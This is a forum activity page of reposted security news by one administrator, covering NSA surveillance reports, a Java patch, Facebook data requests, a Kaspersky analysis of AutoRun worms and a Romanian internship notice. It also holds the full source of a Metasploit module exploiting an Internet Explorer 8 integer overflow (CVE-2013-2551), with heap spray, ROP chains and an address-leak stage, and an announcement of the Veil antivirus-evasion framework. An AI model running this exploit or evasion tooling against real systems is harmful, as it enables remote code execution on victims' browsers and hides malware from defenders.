Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    Nu am scris eu. Ar fi foarte multe lucruri de spus. Aveti putina rabdare...
  2. Nytro
    [h=3]Evidence that the NSA Is Storing Voice Content, Not Just Metadata[/h] Interesting speculation that the NSA is storing everyone's phone calls, and not just metadata. Definitely worth reading. I expressed skepticism about this just a month ago. My assumption had always been that everyone's compressed voice calls is just too much data to move around and store. Now, I don't know. There's a bit of a conspiracy-theory air to all of this speculation, but underestimating what the NSA will do is a mistake. General Alexander has told members of Congress that they can record the contents of phone calls. And they have the technical capability. Earlier reports have indicated that the NSA has the ability to record nearly all domestic and international phone calls -- in case an analyst needed to access the recordings in the future. A Wired magazine article last year disclosed that the NSA has established "listening posts" that allow the agency to collect and sift through billions of phone calls through a massive new data center in Utah, "whether they originate within the country or overseas." That includes not just metadata, but also the contents of the communications. William Binney, a former NSA technical director who helped to modernize the agency's worldwide eavesdropping network, told the Daily Caller this week that the NSA records the phone calls of 500,000 to 1 million people who are on its so-called target list, and perhaps even more. "They look through these phone numbers and they target those and that's what they record," Binney said. Brewster Kahle, a computer engineer who founded the Internet Archive, has vast experience storing large amounts of data. He created a spreadsheet this week estimating that the cost to store all domestic phone calls a year in cloud storage for data-mining purposes would be about $27 million per year, not counting the cost of extra security for a top-secret program and security clearances for the people involved. I believe that, to the extent that the NSA is analyzing and storing conversations, they're doing speech-to-text as close to the source as possible and working with that. Even if you have to store the audio for conversations in foreign languages, or for snippets of conversations the conversion software is unsure of, it's a lot fewer bits to move around and deal with. And, by the way, I hate the term "metadata." What's wrong with "traffic analysis," which is what we've always called that sort of thing? Sursa: Schneier on Security: Evidence that the NSA Is Storing Voice Content, Not Just Metadata
  3. Nytro
    [h=1]Veil – AV Evasion[/h] [h=1]Veil v2.0 : Towards a True Framework[/h] June 17, 2013 by The Grayhound Repo Location: https://github.com/ChrisTruncer/Veil Team Veil is proud to announce the release of Veil v2.0. This drastically reworked version of the Veil AV-evasion framework incorporates a new structure, a slew of new features, and a variety of new payloads: New Structure Veil has moved from a single flat file towards a truly modular framework: Payload modules dropped into ./modules/payloads/[language] are loaded into the framework automatically Common reusable functions are stored in various files in ./modules/common/* Source/compiled files are output by default to ./output/source/ and ./output/compiled/ ./config/update.py is executed automatically on first run, producing a common configuration file at ./config/veil.py, which can be edited manually External tools used by payloads are stored in ./tools/ ./doc/* contains pydoc generated documentation for the framework [*]A tutorial describing how to develop payload modules is forthcoming. New features Veil’s menus and interface have been redesigned for increased usability. One of the common requests for Veil was the inclusion of additional msfvenom shellcode payloads. To incorporate this, we built in automatic crawling of the metasploit /windows/* payload tree and the extraction of necessary payload parameters. The payloads should tab complete within the shellcode selection menu, in msfvenom windows/PAYLOAD format. Tab completion has also been added in a variety of places around the framework, including most menus, LHOST for IP completion, and LPORT for 4444 completion. Try it out! A new python ‘crypter’ named ‘pyherion’ (inspired by Null Security’s Hyperion) has been introduced, which encapsulates python payload files in an AES/base64 encoded wrapper that dynamically decodes/decrypts the python code in memory and executes it. A standalone version has also been introduced in ./tools/pyherion.py . A short post explaining its implementation details will be forthcoming. Command line switches have been implemented for almost all options. Type ./Veil.py -h for details. New payloads C payloads – Using both a void pointer reference and direct injection into memory with VirrtualAlloc calls Powershell – VirtualAlloc injection, MSF-psexec formatted resource file generation, and download/execution of a secondary payload. C# payloads – VirtualAlloc and base64 obfuscated payloads have been introduced, along with C# .exe compilation. Native payloads – hyperion and pescrambler Sursa: https://www.veil-evasion.com/
  4. Nytro
    [h=1]Stagiu de practic? la Guvern pentru tinerii studen?i sau absolven?i cu no?iuni de baz? IT. Ce criterii trebuie s? îndeplineasc?[/h]Studen?ii sau absolven?ii de programe universitare de licen?? cu vârsta de pân? la 25 ani ?i cuno?tin?e de baz? în domeniul IT pot aplica pân? la 1 iulie pentru un program de practic? de specialitate (internship) la Cancelaria primului-ministru sau Secretariatul General al Guvernului. Ac?iunea este ini?iat? în baza programului de guvernare, care prevede crearea unui sistem real de internship în administra?ia public? central? ?i local? pentru studen?ii cu rezultate deosebite, informeaz? Executivul. Un program de internship presupune un stagiu de practic? la locul de munc? pentru cariere profesioniste, destinat studen?ilor sau absolven?ilor de studii universitare, prin care ace?tia se pot familiariza cu specificul unei structuri ?i cunosc fluxul de activit??i sprijinind direct angaja?ii la îndeplinirea activit??ilor zilnice. Pentru a fi inclu?i în program, tinerii trebuie s? îndeplineasc?, cumulativ, o serie de criterii de eligibilitate, respectiv s? de?in? cet??enia român?, s? aib? vârsta de pân? la 25 de ani, s? fie studen?i ori tineri absolven?i ai programelor universitare de licen??, s? cunoasc? bine cel pu?in o limb? str?in? de circula?ie interna?ional? ?i s? aib? cuno?tin?e de baz? în domeniul IT (respectiv cuno?tin?e avansate pentru aplica?ii la Direc?ia Servicii Online ?i Design). Candida?ilor ce vor fi ale?i pentru lista scurt? li se vor solicita materiale justificative suplimentare în sprijinul aplica?iei lor. Formularul de aplica?ie poate fi accesat din pagina de internet internship.gov.ro, iar termenul limit? pentru depunerea aplica?iilor, prin e-mail c?tre adresa oficial? a programului internship@gov.ro, este 1 iulie 2013 inclusiv. Aplica?iile primite ulterior nu vor fi luate în considerare. Tinerii selecta?i vor fi repartiza?i, în raport cu competen?ele acestora, la Cancelaria primului-ministru sau Secretariatul General al Guvernului. Sursa: Stagiu de practic? la Guvern pentru tinerii studen?i sau absolven?i cu no?iuni de baz? IT. Ce criterii trebuie s? îndeplineasc? - Mediafax
  5. Nytro
    How NSA access was built into Windows Duncan Campbell 04.09.1999 Careless mistake reveals subversion of Windows by NSA. A CARELESS mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors). The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA "help information" trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled. The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA. Computer security specialists have been aware for two years that unusual features are contained inside a standard Windows software "driver" used for security and encryption functions. The driver, called ADVAPI.DLL, enables and controls a range of security functions. If you use Windows, you will find it in the C:\Windows\system directory of your computer. [TABLE=class: img, width: 100%] [TR] [TD] [/TD] [/TR] [/TABLE] ADVAPI.DLL works closely with Microsoft Internet Explorer, but will only run cryptographic functions that the US governments allows Microsoft to export. That information is bad enough news, from a European point of view. Now, it turns out that ADVAPI will run special programmes inserted and controlled by NSA. As yet, no-one knows what these programmes are, or what they do. Dr Nicko van Someren reported at last year's Crypto 98 conference that he had disassembled the ADVADPI driver. He found it contained two different keys. One was used by Microsoft to control the cryptographic functions enabled in Windows, in compliance with US export regulations. But the reason for building in a second key, or who owned it, remained a mystery. A second key Two weeks ago, a US security company came up with conclusive evidence that the second key belongs to NSA. Like Dr van Someren, Andrew Fernandez, chief scientist with Cryptonym of Morrisville, North Carolina, had been probing the presence and significance of the two keys. Then he checked the latest Service Pack release for Windows NT4, Service Pack 5. He found that Microsoft's developers had failed to remove or "strip" the debugging symbols used to test this software before they released it. Inside the code were the labels for the two keys. One was called "KEY". The other was called "NSAKEY". Fernandes reported his re-discovery of the two CAPI keys, and their secret meaning, to "Advances in Cryptology, Crypto'99" conference held in Santa Barbara. According to those present at the conference, Windows developers attending the conference did not deny that the "NSA" key was built into their software. But they refused to talk about what the key did, or why it had been put there without users' knowledge. A third key?! But according to two witnesses attending the conference, even Microsoft's top crypto programmers were astonished to learn that the version of ADVAPI.DLL shipping with Windows 2000 contains not two, but three keys. Brian LaMachia, head of CAPI development at Microsoft was "stunned" to learn of these discoveries, by outsiders. The latest discovery by Dr van Someren is based on advanced search methods which test and report on the "entropy" of programming code. Within the Microsoft organisation, access to Windows source code is said to be highly compartmentalized, making it easy for modifications to be inserted without the knowledge of even the respective product managers. Researchers are divided about whether the NSA key could be intended to let US government users of Windows run classified cryptosystems on their machines or whether it is intended to open up anyone's and everyone's Windows computer to intelligence gathering techniques deployed by NSA's burgeoning corps of "information warriors". According to Fernandez of Cryptonym, the result of having the secret key inside your Windows operating system "is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system". The NSA key is contained inside all versions of Windows from Windows 95 OSR2 onwards. "For non-American IT managers relying on Windows NT to operate highly secure data centres, this find is worrying", he added. "The US government is currently making it as difficult as possible for "strong" crypto to be used outside of the US. That they have also installed a cryptographic back-door in the world's most abundant operating system should send a strong message to foreign IT managers". "How is an IT manager to feel when they learn that in every copy of Windows sold, Microsoft has a 'back door' for NSA - making it orders of magnitude easier for the US government to access your computer?" he asked. Can the loophole be turned round against the snoopers? Dr van Someren feels that the primary purpose of the NSA key inside Windows may be for legitimate US government use. But he says that there cannot be a legitimate explanation for the third key in Windows 2000 CAPI. "It looks more fishy", he said. Fernandez believes that NSA's built-in loophole can be turned round against the snoopers. The NSA key inside CAPI can be replaced by your own key, and used to sign cryptographic security modules from overseas or unauthorised third parties, unapproved by Microsoft or the NSA. This is exactly what the US government has been trying to prevent. A demonstration "how to do it" program that replaces the NSA key can be found on Cryptonym's website. According to one leading US cryptographer, the IT world should be thankful that the subversion of Windows by NSA has come to light before the arrival of CPUs that handles encrypted instruction sets. These would make the type of discoveries made this month impossible. "Had the next-generation CPU's with encrypted instruction sets already been deployed, we would have never found out about NSAKEY." Sursa: How NSA access was built into Windows | Telepolis
  6. Nytro

    Fun stuff

    Nytro replied to Wisa's topic in Discutii non-IT

    http://fbcdn-sphotos-g-a.cloudliv.net/hphotos-ak-ash4/5223013_371023452991370_522301357_n.jpgb
  7. Nytro
    [h=1]AutoRun. Reloaded[/h]Konstantin Markov Kaspersky Lab Expert Posted June 13, 11:17 GMT Recent months have produced little of interest among worms written in Java and script languages such as JavaScript and VBScript. The main reason behind this was the limited proficiency of the virus writers, whose creations were anything but remarkable. However, a couple of malware samples grabbed our attention; their complexity is testimony to the fact that professionals sometimes get involved as well. Kaspersky Lab’s products detect these special worms as Worm.JS.AutoRun and Worm.Java.AutoRun. They are also detected by heuristic methods as HEUR:Worm.Script.Generic and HEUR:Worm.Java.Generic respectively. These two worms have three key features in common: heavy obfuscation, backdoor-type essential payloads, and similar methods of propagation. Both worms spread by copying themselves and the configuration file autorun.inf into the root folders of logical volumes of removable storage media and network disks. If these infected storages are opened on other computers, the infection can spread. Having infected the operating system and established a foothold on the victim computer, the malicious programs deploy their principal payload. For months, the number of AutoRun worms detected on Kaspersky Lab users’ computers remained essentially unchanged. According to Kaspersky Security Network data, half of all script worms spread themselves this way. As for Java worms, this is not their usual method of propagation. However, in the last three months we have seen a dramatic rise in the number of new Worm.Java.AutoRun modifications. Detection levels for unique script worms, AutoRun script worms, and heuristically detected AutoRun script worms April 2012 – May 2013 Detection levels for Java worms, AutoRun Java worms, and heuristically detected AutoRun Java worms August 2011 – May 2013 Both worms are polymorphic: they modify their bodies during propagation, complicating their detection. This is one of the reasons why they have become more prominent compared with “regular” worms. Below is a narrative of what we have encountered. [h=2]Worm.Java.AutoRun[/h] There are not many Java-based resident malware programs for PC, and worms are especially rare. So we undertook a detailed analysis of this sample. The worm deploys itself on an infected computer in the form of four files: Java archive: the core component; its name changes in each infection attempt. It is located in the users’ temporary folder %TEMP%\jar_cache*.tmp. Autorun.inf: a configuration file which ensures the worm is launched automatically when infected external storage media or a mounted network drive is opened. DLL file: an auxiliary (Win 32) DLL which is responsible for part of the propagation task. The name of this file also varies: it is defined at the time when the computer is infected. The DLL is copied to the user’s temporary folder: %TEMP%\hsperfdata_%USERNAME%\ Java.exe is a legal executable file of the pre-installed JAVA package. The worm uses it to ensure it can always load itself into the memory of an infected computer. When an infection occurs, this executable file is coped from %ProgramFiles% to the user’s temporary folder (beside the above DLL) and is given a name associated with a system process, e.g. winlogon, csrss, or services. Then it is executed using the launch parameters of the Java archive, which is the core component. Fragment of the class-file of a malicious JAVA archive Once initialized, the malicious Java archive extracts a dll from itself, copies itself to the temporary user catalogue and also copies the executive file Java.exe from %ProgramFiles% to the same catalogue, giving it a “trusted” name and executing it with the launch parameters of the duplicated Java archive. Then the Java archive injects the above library into the process created to distribute the worm to any available network sections and removable media. The launched malware occasionally sends requests to a command center to receive instructions from the cybercriminal. As well as these quirks, this worm also uses strong obfuscation. Here a packer is used in conjunction with Zelix KlassMaster obfuscation. Also, as mentioned above, the worm is polymorphic. This makes it more difficult for antivirus solutions to detect. According to Kaspersky Security Network, the worm is most widely distributed in India and Malaysia. The overall picture is shown on the map below. Geographical distribution of users protected against Worm.Java.AutoRun, January-May 2013 According to the same data, the worm was most frequently picked up by Kaspersky Lab products at the end of May. Most of these detections referred to its most recent modifications, those which provoked the sudden spike in detections. This worm is still actively distributing itself, so we are continuing to closely monitor its activities. Number of users protected against Worm.Java.AutoRun, April-May 2013 [h=2]Worm.JS.AutoRun[/h] The distribution model of this worm not only uses the above method with autorun.inf, but also FTP-servers, file share sites, shared folders and CD/DVDs burned on the infected computers. The worm multiplies itself in catalogues and adds its launch to auto launch. At this time it checks the environment where it was launched. If the worm is launched on a non-virtual machine, it starts to search for active monitoring and PC protection tools. If they are detected, the worm terminates their work. The malware receives commands via a file downloaded from the command center. These instructions are mostly about collecting information from the infected system. In particular, cybercriminals want the worm to gather information about the system, the user and the installed software. Like Worm.Java.AutoRun, this sample is well-encrypted and can change its form in different infections. Code fragment for Worm.JS.AutoRun Like the Java worm, this malware is most widespread in Southeast Asia, though this variant is more active in Vietnam and Indonesia. Geographical distribution of users protected from Worm.JS.AutoRun from the beginning of 2013 to the end of May, 2013 Number of users protected from Worm.JS.AutoRun in the beginning of 2013 till the end of May, 2013 In this diagram you can see the number of users protected with the signature method only. Far more users are protected with heuristic methods, as shown in the first diagram. According to Kaspersky Security Network data, Windows XP is widely used in those countries with large numbers of malware detections. More recent Microsoft versions ask users to confirm autorun execution, which decreases the chances of getting infected. Starting from Windows 7, only CD/DVD carriers are allowed to run automatically. When using external storage devices (for instance, a USB flash drive), autorun is switched off. In order to protect your computer from infection, we advise you to update critical OS units and antivirus databases installed on the computer. You will find the guidelines about how to set the autorun function and links to updates in the following Microsoft article: http://support.microsoft.com/kb/967715 Sursa: AutoRun. Reloaded - Securelist
  8. Nytro
    [h=1]Critical Java SE update due Tuesday fixes 40 flaws[/h] [h=2]And yes, most are remotely exploitable[/h] By Neil McAllister in San Francisco, 14th June 2013 Thought your Java security woes were behind you? Think again. Oracle is planning to release a Critical Patch Update on Tuesday that affects multiple versions of Java, and it's another doozy. According to Oracle's security announcement, the patch pack addresses 40 different vulnerabilities. All update levels of Java SE 5, 6, and 7 are affected by the flaws, as are all versions of JavaFX. Of the 40 bugs, all but three are remotely exploitable over a network without the need for a username or password. Yes, that's bad. Oracle ranks the severity of its flaws using the Common Vulnerability Scoring System (CVSS), and the top-ranked bug in this particular update rates a 10.0 – the highest possible score. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible," the database giant helpfully suggests. Oracle ordinarily releases Critical Patch Updates four times a year on a set schedule, but this will already be the fourth such update issued in 2013. The first shipped on February 1, but Oracle reissued it later in the month with additional fixes. It also scheduled another, previously unplanned update for April. Each of those earlier updates contained upward of 40 fixes, and each similarly addressed flaws that rated 10.0 on the CVSS severity scale. Oracle has not yet disclosed which vulnerabilities will be patched by the June update, but previous Critical Patch Updates have patched vulnerabilities in a wide range of Java APIs and subsystems. These flaws could potentially affect a whole host of Java software and were not limited to programs running via the Java browser plugin, as has been the case with some previous Java exploits. Oracle plans to release its latest Java SE Critical Patch Update on June 18, 2013. After that, the next update is currently scheduled for October 15. ® Sursa: Critical Java SE update due Tuesday fixes 40 flaws • The Register
  9. Nytro
    [h=1]Web Developer Security 1.0[/h] Raymond Forbes and I will be presenting Web Developer Security 1.0 on Tuesday, June 18th at 12:15 pm PDT. The training will be held in Mozilla’s Mountain View office and also broadcast online. We will cover a grab bag of proactive security measures Web Developers can take to protect their users and their site. Rather than focusing on how to attack a website, this training focuses on how you can safeguard your website from common threats. Some of the topics we will cover include Content Security Policy, X-Frame-Options, cookie security flags, iframe sandbox, content sanitization, and sensitive data encryption. Deploying these techniques will help protect your users and improve the security of your site. For those of you who are able to come watch the talk in person, there will be Punch & Pie! https://air.mozilla.org/web-security-training/ Sursa: Web Developer Security 1.0 | Mozilla Security Blog
  10. Nytro
    [h=1]MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank }) def initialize(info={}) super(update_info(info, 'Name' => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", 'Description' => %q{ This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001). }, 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Joly', # Vulnerability discovery, PoC and analysis '4B5F5F4B', # PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2551' ], [ 'OSVDB', '91197' ], [ 'BID', '58570' ], [ 'MSB', 'MS13-037' ], [ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ], [ 'URL', 'http://binvul.com/viewthread.php?tid=311' ] ], 'Payload' => { 'Space' => 948, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default { 'Rop' => :jre, 'Offset' => '0x5f4' } ], # requires: # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation) # * ntdll.dll v6.1.7601.17725 (MS12-001) [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak', { 'Rop' => :ntdll, 'Offset' => '0x5f4' } ] ], 'Privileged' => false, 'DisclosureDate' => "Mar 06 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def exploit @second_stage_url = rand_text_alpha(10) @leak_param = rand_text_alpha(5) super end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0c0c # For IE 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_ntdll_rop case @ntdll_version when "6.1.7601.17514" stack_pivot = [ @ntdll_base+0x0001578a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop when "6.1.7601.17725" stack_pivot = [ @ntdll_base+0x0001579a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141 # OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop else return "" end end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :jre print_status("Using JRE ROP") stack_pivot = [ 0x7c348b06, # ret # from msvcr71 0x7c341748, # pop ebx # ret # from msvcr71 0x7c348b05 # xchg eax, esp # ret from msvcr71 ].pack("V*") rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) when :ntdll print_status("Using ntdll ROP") rop_payload = get_ntdll_rop + payload.encoded end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x1000; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x1000; i++){ a[i] = document.getElementById("rect" + i.toString())._anchorRect; if (i == 0x800) { vml1.dashstyle = "1 2 3 4" } } vml1.dashstyle.array.length = 0 - 1; vml1.dashstyle.array.item(6) = 0x0c0c0c0c; for (var i=0; i<0x1000; i++) { delete a[i]; CollectGarbage(); } location.reload(); } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <script> #{js} </script> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def html_info_leak js_trigger = %Q| var rect_array = new Array() var a = new Array() function createRects(){ for(var i=0; i<0x400; i++){ rect_array[i] = document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } } function exploit(){ var vml1 = document.getElementById("vml1") for (var i=0; i<0x400; i++){ a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle; } for (var i=0; i<0x400; i++){ a[i].rotation; if (i == 0x300) { vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44" } } var length_orig = vml1.dashstyle.array.length; vml1.dashstyle.array.length = 0 - 1; for (var i=0; i<0x400; i++) { a[i].marginLeft = "a"; marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16); if (marginLeftAddress > 0) { vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300; var leak = a[i].marginLeft; vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress; vml1.dashstyle.array.length = length_orig; document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ) return; } } } | create_rects_func = "createRects" exploit_func = "exploit" if datastore['OBFUSCATE'] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end html = %Q| <html> <head> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/ html = html_info_leak html = html.gsub(/^\t\t/, '') print_status("Sending HTML to info leak...") send_response(cli, html, {'Content-Type'=>'text/html'}) else leak = begin request.uri_parts["QueryString"][@leak_param].to_i rescue 0 end if leak == 0 html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) return end vprint_status("ntdll leak: 0x#{leak.to_s(16)}") fingerprint = leak & 0x0000ffff case fingerprint when 0x70B0 @ntdll_version = "6.1.7601.17514" @ntdll_base = leak - 0x470B0 when 0x7090 @ntdll_version = "6.1.7601.17725" # MS12-001 @ntdll_base = leak - 0x47090 else print_error("ntdll version not detected, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end end Sursa: MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
  11. Nytro
    [h=2]Facebook Reveals Details of US Data Requests[/h]By AFP on June 15, 2013 WASHINGTON - Facebook revealed Friday it received between 9,000 and 10,000 requests for user data from US authorities in the second half of last year, as it seeks to shield itself from a growing scandal. The requests covered issues from child disappearances to petty crimes and terror threats and targeted between 18,000 and 19,000 accounts, the social networking site said, without revealing how often it complied with the requests. Facebook "aggressively" protects its users' data, the company's general counsel Ted Ullyot said in a statement. "We frequently reject such requests outright, or require the government to substantially scale down its requests, or simply give the government much less data than it has requested. And we respond only as required by law," he added. Facebook is fighting an expanding public backlash after a government contractor revealed it was among nine Internet giants that turned over user data to the secret National Security Agency surveillance program PRISM. The companies, which also include Apple, Google, Microsoft and Yahoo, have denied claims the NSA could directly access their servers. US authorities have said the program helped prevent terror attacks. Facebook said it was able to report all US national security-related requests, which no company had previously been allowed to do, after pressing the government to release more details about the program. But, for now, it said the government would only allow Facebook to provide the numbers in aggregate form and as a range. "This is progress, but we're continuing to push for even more transparency, so that our users around the world can understand how infrequently we are asked to provide user data on national security grounds," Ullyot said. Google asked the FBI and US Justice Department this week for permission to release numbers related to its handing over of data for the leaked surveillance programs, saying it has "nothing to hide." The company's "transparency report" on government requests does not include national security requests under the Foreign Intelligence Surveillance Act (FISA) that authorized PRISM. In a statement Friday, a Google spokesperson said the company has "always believed it's important to differentiate between different types of government requests," adding that it wants to "publish aggregate numbers of national security requests, including FISA disclosures, separately." Leaker Edward Snowden, who worked as a subcontractor handling computer networks for the NSA, is in Hong Kong, a semi-autonomous Chinese territory, where he has vowed to contest any possible extradition in court. He also revealed the NSA's gathering of a huge trove of telephone metadata. US authorities said they could not mine the logs to target a specific user without authorization from a secret court. Sursa: Facebook Reveals Details of US Data Requests | SecurityWeek.Com
  12. Nytro
